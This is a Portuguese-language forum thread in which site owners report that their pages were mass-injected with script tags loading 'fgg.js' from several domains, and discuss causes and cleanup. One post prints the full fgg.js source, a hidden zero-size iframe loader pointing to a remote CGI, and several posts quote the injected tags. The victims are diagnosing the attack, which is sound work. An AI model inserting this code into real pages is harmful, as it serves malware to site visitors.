Acessaram meu site e colocaram um código alguém já passou por isso?

[Leandromx 0]

Oi pessoal boa tarde,

 

De ontem para hoje, acessaram 2 sites meus e colocaram em todas as páginas isso daqui

<script src=http://www.tctcow.com/fgg.js></script><script src=http://www.hdrcom.com/fgg.js></script><script src=http://www.cdrpoex.com/fgg.js></script><script src=http://www.tertad.mobi/fgg.js></script><script src=http://www.loopadd.com/fgg.js></script><script src=http://www.cliprts.com/fgg.js></script>

Estranho que até nas páginas que não tem consulta SQL só um simples HTML colocaram.

Liguei para hospedagem e disseram que não houve invasão, aqui só eu mexo com as senhas e ftp.

Estranho que um dos site em um BLOG wordpress e até nele colocaram.

Não mexeram no BD e nem apagaram nada só acrescentaram isso, e olha que tem um site que é um portal tem coisa pra caramba..

 

Alguém já passou por isso?

Caso sim qual providência que tomou?

[Otata 4]

a cara alguem entrou no seu ftp pq como a pessou colocou isso lah ? magica que não eh neh...da uma olhada no log do ftp pra ver algo que pra ver se você ve algo estranho lah...

[hgb7 3]

esta injeção foi automática... não vejo como sendo manual...

[hinom 5]

o que o hgb7 comentou é o mais provável

 

você executou algum virus ou o suporte do seu host está te enrolando

[Leandro Senni 1]

podem ter feito cagada e afeto usuarios... mais deve ter algum virus em teu computador...

 

tenta o LOG do Sistema. na SECCAO correta ok..

[OAprendiz 0]

Cara, meu site também foi invadido em sua mais de 350 páginas. Notei porque ao acessar uma palavra chave que direcionava o Google para o site tive a desagradável surpresa de ler:

Este site pode danificar seu computador.

Entrei em contato com meu hospedeiro por diversas vezes e não tive uma solução por lá. Um usuário do Google Adsense foi quem me alertou que havia um código maligno em todas as páginas. Verifiquei e notei ser verdade. Aparecia lá o seguinte código que eu não coloquei:

<script src=http://www.pyttco.com/fgg.js></script><script src=http://www.hdrcom.com/fgg.js></script><script src=http://www.movaddw.com/fgg.js></script><script src=http://www.pyttco.com/fgg.js></script>

A partir daí, notei que o Avast também detectava um malware ao acessar meu site, com a proteção residente.

Então, por mais de quatro horas trabalhei retirando o código de todas as páginas. Agora está limpo, mas não sei o que faço pra não ser atacado de novo. E o prejuízo? O Google acusando meu site de disseminador de maware. De 2400 visitantes únicos dia, caiu para 160.

Será que não é uma falha do serviço de hospedagem?

Qual o seu?

O meu é Digital Server

Se tiver alguma idéia de como nos livramos disse, me avise. A dica que tenho por enquanto é: trocar a senha sempre.

 

Francisco

 

 

 

Oi pessoal boa tarde,

 

De ontem para hoje, acessaram 2 sites meus e colocaram em todas as páginas isso daqui

<script src=http://www.tctcow.com/fgg.js></script><script src=http://www.hdrcom.com/fgg.js></script><script src=http://www.cdrpoex.com/fgg.js></script><script src=http://www.tertad.mobi/fgg.js></script><script src=http://www.loopadd.com/fgg.js></script><script src=http://www.cliprts.com/fgg.js></script>

Estranho que até nas páginas que não tem consulta SQL só um simples HTML colocaram.

Liguei para hospedagem e disseram que não houve invasão, aqui só eu mexo com as senhas e ftp.

Estranho que um dos site em um BLOG wordpress e até nele colocaram.

Não mexeram no BD e nem apagaram nada só acrescentaram isso, e olha que tem um site que é um portal tem coisa pra caramba..

 

Alguém já passou por isso?

Caso sim qual providência que tomou?

[Leandromx 0]

Então galera, tenho lá na kinghost.

Estranho que outros sites que tenho dentro da revenda com as mesmas senhas não atingiram

Ainda não descobri o que fazer para evitar isso,

Mas eu vi um tópico aqui no forum sobre bloquear alguma coisa...

 

você está hospedado aonde?

[OAprendiz 0]

Eu estou hospedado na Digital Server, do Gcom: http://www.digitalserver.com.br/

Já penso em trocar de hospedagem. O duro é que tenho plano pago com eles até fev. de 2009. E agora que invadiram, o pessoal da Digital Server diz que não é culpa deles. Não sei o que faço.

Se alguém tiver uma idéia, postem aqui.

 

 

Cara, meu site também foi invadido em sua mais de 350 páginas. Notei porque ao acessar uma palavra chave que direcionava o Google para o site tive a desagradável surpresa de ler:

Este site pode danificar seu computador.

Entrei em contato com meu hospedeiro por diversas vezes e não tive uma solução por lá. Um usuário do Google Adsense foi quem me alertou que havia um código maligno em todas as páginas. Verifiquei e notei ser verdade. Aparecia lá o seguinte código que eu não coloquei:

<script src=http://www.pyttco.com/fgg.js></script><script src=http://www.hdrcom.com/fgg.js></script><script src=http://www.movaddw.com/fgg.js></script><script src=http://www.pyttco.com/fgg.js></script>

A partir daí, notei que o Avast também detectava um malware ao acessar meu site, com a proteção residente.

Então, por mais de quatro horas trabalhei retirando o código de todas as páginas. Agora está limpo, mas não sei o que faço pra não ser atacado de novo. E o prejuízo? O Google acusando meu site de disseminador de maware. De 2400 visitantes únicos dia, caiu para 160.

Será que não é uma falha do serviço de hospedagem?

Qual o seu?

O meu é Digital Server

Se tiver alguma idéia de como nos livramos disse, me avise. A dica que tenho por enquanto é: trocar a senha sempre.

 

Francisco

 

 

 

Oi pessoal boa tarde,

 

De ontem para hoje, acessaram 2 sites meus e colocaram em todas as páginas isso daqui

<script src=http://www.tctcow.com/fgg.js></script><script src=http://www.hdrcom.com/fgg.js></script><script src=http://www.cdrpoex.com/fgg.js></script><script src=http://www.tertad.mobi/fgg.js></script><script src=http://www.loopadd.com/fgg.js></script><script src=http://www.cliprts.com/fgg.js></script>

Estranho que até nas páginas que não tem consulta SQL só um simples HTML colocaram.

Liguei para hospedagem e disseram que não houve invasão, aqui só eu mexo com as senhas e ftp.

Estranho que um dos site em um BLOG wordpress e até nele colocaram.

Não mexeram no BD e nem apagaram nada só acrescentaram isso, e olha que tem um site que é um portal tem coisa pra caramba..

 

Alguém já passou por isso?

Caso sim qual providência que tomou?

[Leandromx 0]

Pede para voltar o backup, briguei com eles. Pedi os logs de 3 dias e achei o IP.

depois de muita "briga" eles voltaram o backup sem custo.

porque normalmente eles cobram.

[Temistokles 0]

Boa tarde!

Estou com o mesmo problema.

 

Identifiquei que o script sempre é inserido antes do final da tag </body> e que a cada vez que ele executa insere o script "fgg.js" proviniente de diversos sites.

 

Segue o script fgg.js

 

CODE

window.status="";

n=navigator.userLanguage.toUpperCase();

if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){

var cookieString = document.cookie;

var start = cookieString.indexOf("vrcgoo=");

if (start != -1){}else{

var expires = new Date();

expires.setTime(expires.getTime()+9*3600*1000);

document.cookie = "vrcgoo=update;expires="+expires.toGMTString();

try{

document.write("<iframe src=http://ecx2.ru/cgi-bin/index.cgi?fgg width=0 height=0 frameborder=0></iframe>");

}

catch(e)

{

};

}}

 

Ele executa uma cgi que, pelo que percebi faz uma varredura em todos os arquivos e altera tudo que for </body> por <script "X"></body>

 

Vamos tentar criar algo que faça uma operação inversa, mas ainda não é a solução.

 

Assim que tivermos novidades eu posto, enquanto isso, espero que alguém posso nos ajudar.

 

Abrasssssssss!!!

[botinha-pb 0]

Oi pessoal boa tarde,

 

De ontem para hoje, acessaram 2 sites meus e colocaram em todas as páginas isso daqui

<script src=http://www.tctcow.com/fgg.js></script><script src=http://www.hdrcom.com/fgg.js></script><script src=http://www.cdrpoex.com/fgg.js></script><script src=http://www.tertad.mobi/fgg.js></script><script src=http://www.loopadd.com/fgg.js></script><script src=http://www.cliprts.com/fgg.js></script>

Estranho que até nas páginas que não tem consulta SQL só um simples HTML colocaram.

Liguei para hospedagem e disseram que não houve invasão, aqui só eu mexo com as senhas e ftp.

Estranho que um dos site em um BLOG wordpress e até nele colocaram.

Não mexeram no BD e nem apagaram nada só acrescentaram isso, e olha que tem um site que é um portal tem coisa pra caramba..

 

Alguém já passou por isso?

Caso sim qual providência que tomou?

Olá.

 

Hoje meu site sofreu um segundo ataque dessa coisa ae que nem sei como chamar.

 

No meu caso a hospedagem é gratuita (www.110mb.com), mas o tipo de ataque é identico.

 

Na primeira vez que sofri o ataque não reagi a tempo e minha página foi considerada pelo Google como uma página perigosa e resultado: de quase 200 acessos diários, meu site registrou menos de 30 acessos por dia.

 

Quase 20 dias depois e ainda não consegui recuperar nem a metade do acessos diários. É muito prejuízo.

 

Dessa vez consegui dectetar esse código malicioso.

 

Se alguém tiver alguma solução, por favor nos ajude :)

 

Um abraço e sucesso a todos :)

[Everton do N. Siqueira 0]

Pior que o meu site aconteceu o mesmo.......

 

Apareceram os mesmos scripts.....

 

Recarreguei todas as páginas novamente....

 

mudei a senha...e novamente colocaram os scripts....

 

Quem souber o que fazer..me avisa,porque o numero de visitas tambem caiu bastante por causa do script malicioso...

[hgb7 3]

http://www.invasao.com.br/blog/2008/03/18/...im-das-duvidas/

 

Espero que ajude de alguma forma ^^

[DarkDragonLord 0]

http://www.invasao.com.br/blog/2008/03/18/...im-das-duvidas/

 

Espero que ajude de alguma forma ^^

estranho que quando vou no Latest Visitors do cPanel no meu site, nunca vi esse cmd mas ja vi de TUDO pra tentar kebrar o meu site.. todos as tentatives resultaram em falha, com meu codigo rox de include :P